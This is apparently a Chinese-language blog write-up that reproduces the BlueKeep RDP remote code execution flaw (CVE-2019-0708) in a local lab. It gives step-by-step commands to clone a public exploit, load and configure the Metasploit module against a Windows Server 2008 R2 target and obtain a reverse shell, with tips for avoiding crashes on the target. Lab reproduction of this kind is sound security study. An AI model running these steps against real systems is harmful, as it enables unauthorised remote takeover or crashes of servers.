CVE-2019-0708本地复现
0x00 前言
CVE-2019-0708是微软于2019年5月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发。该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的 。
2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。
0x01 影响版本
| 1 | Windows 7 | 
0x02 环境搭建
环境准备
| 1 | Windows server 2008 R2 IP: 192.168.72.140 | 
Windows server 2008 R2
开启3389
修改注册表Win + R 输入 regedit 进入注册表编辑器,按以下目录找到 fDisableCam 并将值改为0
| 1 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0 | 

kali Linux
下载文件
| 1 | git clone https://github.com/TinToSer/bluekeep-exploit | 

可以看到有四个.rb后缀的文件,接下来将它们放至相应的目录(rdp目录需要自己创建)
| 1 | cd bluekeep-exploit | 
0x03 漏洞利用
启动msf
| 1 | msfconsole | 

重新加载所有模块
| 1 | reload_all | 

搜索漏洞模块
| 1 | search cve_2019_0708 | 

开始利用
使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 启用0708RDP攻击模块
使用 info 可以查看工具相关信息以及设置
| 1 | 可以看到我们需要设置的选项主要为RHOSTS \ RPORT \ target | 
使用 show options 查看设置情况
| 1 | msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options | 
更改设置
| 1 | set rhosts 192.168.10.10 //设置目标主机(win server 2008 R2) | 

设置完参数之后,使用 run 开启攻击
反弹shell成功!!!
0x04 遇到的问题
- 加载模块失败 - 出现了 - WARNING! The following modules could not be loaded!错误,提示我们新加入的模块无法被加载。- 这个问题我一开始在网上也没找到相关的解决办法,我是直接安装的 - 2019.03版本的,没在出现这个问题。- 后来在网上看到这篇文章貌似可以: https://blog.csdn.net/weixin_42380348/article/details/100642788 
- 每次攻击出现蓝屏,然后靶机关机 - 设置完参数之后,开始攻击run,靶机出现蓝屏,然后关机  - kali出现  - 这里可以将参数 - target设置为其他ID,我是设置为2,然后run。
0x05 漏洞原理
原理还是等有时间在搞吧。。。。。